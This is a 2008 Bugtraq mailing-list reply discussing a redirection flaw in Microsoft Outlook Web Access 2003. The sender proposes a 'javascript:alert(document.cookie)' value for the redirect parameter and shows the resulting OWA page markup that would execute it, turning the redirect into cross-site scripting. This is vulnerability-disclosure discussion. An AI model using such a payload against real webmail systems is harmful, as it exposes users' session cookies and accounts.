Date: Wed, 15 Oct 2008 19:51:39 +0200
From: Stefano Di Paola <stefano.dipaola@...ec.it>
To: Martin Suess <martin.suess@...c.ch>
Cc: bugtraq@...urityfocus.com
Subject: Re: MS OWA 2003 Redirection Vulnerability

Did you try setting it to :

javascript:alert(document.cookie)

If there are no/dumb filters you'll get

<!--Copyright (c) 2000-2003 Microsoft Corporation.  All rights
reserved.-->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<script>
	try
	{
		window.location = "javascript:alert(document.cookie)";
	}
	catch(e){}
</script>
</head>

which is better than a simple redirection.

Sorry but at the moment I cannot check it by myself.

Cheers,
Stefano

--
...oOOo...oOOo....